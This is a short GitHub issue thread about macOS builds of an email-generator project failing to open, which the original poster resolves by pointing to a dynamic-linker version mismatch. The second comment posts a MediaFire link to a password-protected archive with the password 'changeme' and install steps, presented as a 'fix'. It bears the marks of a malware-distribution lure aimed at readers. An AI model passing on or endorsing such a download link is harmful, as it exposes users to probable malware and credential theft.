### ISSUE TITLE
MacOS builds don't work

### ISSUE THREAD

**Issue by ApolloFops** [CoffeeCoder1/Email-Generator#2]
The MacOS builds from GitHub actions do not work, showing an error that the application can not be opened.

<img width="372" alt="Screenshot 2024-08-26 at 23 10 17" src="https://github.com/user-attachments/assets/f36e9322-f5e8-4f0b-8ce3-6b5c0b3be7fa">

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ApolloFops** [comment]
I think this has something to do with the fact that the GitHub Actions runner is running on a newer version of MacOS than my MacBook, which the dynamic linker doesn't like. It seems like the DMG version of the builds do not have this problem, so I am closing this for now.
